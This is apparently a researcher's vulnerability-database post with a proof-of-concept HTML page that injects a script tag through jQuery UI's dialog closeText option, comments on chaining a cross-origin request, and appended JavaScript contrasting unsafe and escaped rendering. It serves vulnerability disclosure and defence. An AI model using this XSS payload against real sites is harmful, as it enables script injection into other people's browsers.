djsubstance (3)

Last Login: March 16, 2021

djsubstance's Latest (1) Contributions

Technical Analysis

PoC:

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>XSS in closeText option of component ui dialog</title>

<script src="https://code.jquery.com/jquery-2.1.4.js"></script>
<script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>
<link rel="stylesheet" type="text/css" href="http://code.jquery.com/ui/1.9.1/themes/base/jquery-ui.css">


<script>

$(document).ready(function () {
    $('#dialog').dialog({ closeText: '<script>alert("XSS")<\/script>' });      // This is the attack point where you can inject code

    // if the CORS/CSP policy is not configured or set up wrong, try a jQuery vuln using $.ajax('https://www.msn.com/robots.txt');
    // if it says onready:1 expand it, you should see msn.com's robots file
    // this is a double whammy of vulnerability in the target
});
</script>

</head>
<body>

<div id="dialog" title="Dialog Title">Content here!</div>

</body>
</html>

Positives: Easy, can potentially execute scripts off remote sites
Negatives: Would likely require user intervention, social engineering or phishing to make this persistent or of real use

Document on how the dialog function is used in jQuery – https://www.tutorialspoint.com/jqueryui/jqueryui_dialog.htm

Here is a link to a site that will prove which jquery exploits are vuln. to which version (specific to jQuery not UI) – https://research.insecurelabs.org/jquery/test/
More info on exploit and poc: https://vuldb.com/?id.98137

dj substance
https://tranceattic.com
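The root cause in the analysis above is an option value (closeText) that is meant to be a plain label but ends up interpolated into markup. The following is an added example, not code from the post or from jQuery UI itself: the function names (renderCloseButtonUnsafe, renderCloseButtonSafe, containsMarkup) are hypothetical, and the sample payload is the constructed string from the PoC. It contrasts the unsafe interpolation with an escaped rendering and adds a simple pre-widget check for label text that would need escaping.

```javascript
// Added example (not from the original post and not jQuery UI's code):
// contrast a caller-supplied label interpolated raw into markup with the
// same label rendered as text, plus a check a defender can run on inputs.

// The five characters that can change HTML context. Rendering a string as
// a DOM text node (e.g. jQuery's .text()) has exactly this effect.
const HTML_ESCAPES = {
  "&": "&amp;",
  "<": "&lt;",
  ">": "&gt;",
  '"': "&quot;",
  "'": "&#39;",
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (hypothetical renderer): closeText lands in the markup
// unchanged, so '<script>alert("XSS")</script>' becomes a live element.
function renderCloseButtonUnsafe(closeText) {
  return `<button class="ui-dialog-titlebar-close">${closeText}</button>`;
}

// Hardened pattern: the same option is escaped first, so the browser shows
// the payload as literal text inside the button.
function renderCloseButtonSafe(closeText) {
  return `<button class="ui-dialog-titlebar-close">${escapeHtml(closeText)}</button>`;
}

// Defender-side check: does a value that should be a plain label contain
// characters the HTML parser would act on? Use it to flag option values that
// arrive from URLs, storage or APIs before they reach any widget.
function containsMarkup(value) {
  return /[<>&]/.test(String(value));
}

// Constructed samples: the payload from the PoC above, and a benign label.
const PAYLOAD = '<script>alert("XSS")</script>';
const BENIGN = "Close";

function demo() {
  return {
    unsafe: renderCloseButtonUnsafe(PAYLOAD),
    safe: renderCloseButtonSafe(PAYLOAD),
    payloadFlagged: containsMarkup(PAYLOAD),
    benignFlagged: containsMarkup(BENIGN),
  };
}

console.log(demo());
```

The safe output still contains the word "script", but only as the text `&lt;script&gt;...`, which the parser never turns into an element; that is the whole difference between a label and an injection point.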